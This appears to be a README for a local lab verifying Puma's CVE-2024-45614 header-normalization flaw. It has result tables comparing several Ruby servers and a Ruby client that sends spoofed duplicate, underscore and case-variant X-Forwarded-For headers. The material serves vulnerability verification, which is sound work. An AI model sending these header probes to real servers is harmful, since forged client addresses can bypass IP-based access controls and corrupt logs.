Puma header normalization CVE-2024-45614 verification
===
- advisory: https://github.com/puma/puma/security/advisories/GHSA-9hf4-67fc-4vf4
- fix commit: https://github.com/puma/puma/commit/cac3fd18cf29ed43719ff5d52d9cfec215f0a043
### Results
Output of running [request.rb](requests.rb)
#### duplicate
| Target | Result |
| --- | --- |
| puma_before_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_before_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| unicorn_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| thin_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| falcon_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2_underscore_on | X_FORWARDED_FOR: 2.2.2.2 |
#### under_score
| Target | Result |
| --- | --- |
| puma_before_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_before_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack2 | X_FORWARDED_FOR: 1.1.1.1 |
| puma_after_fix_rack3 | X_FORWARDED_FOR: 1.1.1.1 |
| pitchfork_rack2 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| pitchfork_rack3 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| unicorn_rack2 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| unicorn_rack3 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| thin_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| falcon_rack3 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| nginx_unicorn_rack2 | X_FORWARDED_FOR: 1.1.1.1 |
| nginx_unicorn_rack2_underscore_on | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
#### reverse_under_score
| Target | Result |
| --- | --- |
| puma_before_fix_rack2 | X_FORWARDED_FOR: 1.1.1.1 |
| puma_before_fix_rack3 | X_FORWARDED_FOR: 1.1.1.1 |
| puma_after_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack2 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| pitchfork_rack3 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| unicorn_rack2 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| unicorn_rack3 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| thin_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| falcon_rack3 | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
| nginx_unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2_underscore_on | X_FORWARDED_FOR: 1.1.1.1,2.2.2.2 |
#### upper_case
| Target | Result |
| --- | --- |
| puma_before_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_before_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| unicorn_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| thin_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| falcon_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2_underscore_on | X_FORWARDED_FOR: 2.2.2.2 |
#### reverse_upper_case
| Target | Result |
| --- | --- |
| puma_before_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_before_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| puma_after_fix_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| pitchfork_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| unicorn_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| thin_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| falcon_rack3 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2 | X_FORWARDED_FOR: 2.2.2.2 |
| nginx_unicorn_rack2_underscore_on | X_FORWARDED_FOR: 2.2.2.2 |
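The page does not include requests.rb itself, so the following is an added Ruby client (written here as an example, not the repository's own script) that sends the five probes from the tables above as hand-built HTTP/1.1 requests, so that duplicate and case-variant header lines reach the server unchanged. It assumes each probe sends 1.1.1.1 first and 2.2.2.2 second, and that config.ru echoes `X_FORWARDED_FOR: <value>` in the response body with a Content-Length header.

```ruby
require "socket"

# Each probe is an ordered list of [header name, value] pairs, each sent as
# its own header line. Assumption: 1.1.1.1 is sent first and 2.2.2.2
# second, matching the names used in the results tables.
PROBES = {
  "duplicate"           => [["X-Forwarded-For", "1.1.1.1"], ["X-Forwarded-For", "2.2.2.2"]],
  "under_score"         => [["X-Forwarded-For", "1.1.1.1"], ["X_Forwarded_For", "2.2.2.2"]],
  "reverse_under_score" => [["X_Forwarded_For", "1.1.1.1"], ["X-Forwarded-For", "2.2.2.2"]],
  "upper_case"          => [["X-Forwarded-For", "1.1.1.1"], ["X-FORWARDED-FOR", "2.2.2.2"]],
  "reverse_upper_case"  => [["X-FORWARDED-FOR", "1.1.1.1"], ["X-Forwarded-For", "2.2.2.2"]],
}.freeze

# Build the raw HTTP/1.1 request bytes. Writing the request by hand keeps
# every header line exactly as listed: Net::HTTP case-folds header names and
# emits each name once, so the duplicate and upper_case probes would never
# reach the server as two separate lines.
def build_request(headers, host: "localhost", path: "/")
  lines = ["GET #{path} HTTP/1.1", "Host: #{host}", "Connection: close"]
  headers.each { |name, value| lines << "#{name}: #{value}" }
  lines.join("\r\n") + "\r\n\r\n"
end

# Return the body of a raw response (assumes Content-Length, not chunked).
def response_body(raw)
  raw.split("\r\n\r\n", 2)[1].to_s.strip
end

# Send one probe to a local server and return the echoed body, which the
# echo app under test is assumed to render as "X_FORWARDED_FOR: <value>".
def probe(port, headers, host: "127.0.0.1")
  TCPSocket.open(host, port) do |sock|
    sock.write(build_request(headers))
    response_body(sock.read)
  end
end

# Run every probe against one server port and return {probe name => body}.
def run_probes(port)
  PROBES.to_h { |name, headers| [name, probe(port, headers)] }
end

# Usage: PROBE_PORT=9000 ruby requests_raw.rb   (one port per server above)
if ENV["PROBE_PORT"]
  run_probes(Integer(ENV["PROBE_PORT"])).each { |name, body| puts "#{name}: #{body}" }
end
```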
### Starting each server
#### Puma
```
# Before the CVE-2024-45614 fix, Rack 2
$ cd puma_before_fix_rack2
$ RACK_ENV=production bundle exec puma -p 9000 ../config.ru
# Before the CVE-2024-45614 fix, Rack 3
$ cd puma_before_fix_rack3
$ RACK_ENV=production bundle exec puma -p 9001 ../config.ru
# After the CVE-2024-45614 fix, Rack 2
$ cd puma_after_fix_rack2
$ RACK_ENV=production bundle exec puma -p 9002 ../config.ru
# After the CVE-2024-45614 fix, Rack 3
$ cd puma_after_fix_rack3
$ RACK_ENV=production bundle exec puma -p 9003 ../config.ru
```
#### Pitchfork
```
# Rack2
$ cd pitchfork_rack2
$ RACK_ENV=production bundle exec pitchfork -p 9010 ../config.ru
# Rack3
$ cd pitchfork_rack3
$ RACK_ENV=production bundle exec pitchfork -p 9011 ../config.ru
```
#### Unicorn
```
# Rack2
$ cd unicorn_rack2
$ RACK_ENV=production bundle exec unicorn -p 9020 ../config.ru
# Rack3
# * At the version examined, Rack 3 support is not complete, but the server still runs
$ cd unicorn_rack3
$ RACK_ENV=production bundle exec unicorn -p 9021 ../config.ru
```
#### Thin
```
# Rack2
$ cd thin_rack2
$ RACK_ENV=production bundle exec thin start -p 9030 -R ../config.ru
# Rack3
# * The version examined does not support Rack 3, so bundle install fails
```
#### Falcon
* Started over HTTP/1 to make verification easier
```
# Rack2
$ cd falcon_rack2
$ RACK_ENV=production bundle exec rackup --server falcon -p 9040 ../config.ru
# * Could not get this running
# Rack3
$ cd falcon_rack3
$ RACK_ENV=production bundle exec rackup --server falcon -p 9041 ../config.ru
```
#### Nginx
```
$ docker run --name heade_test_nginx -v $(pwd)/nginx.conf:/etc/nginx/nginx.conf:ro -d -p 9100:80 -p 9101:81 nginx
```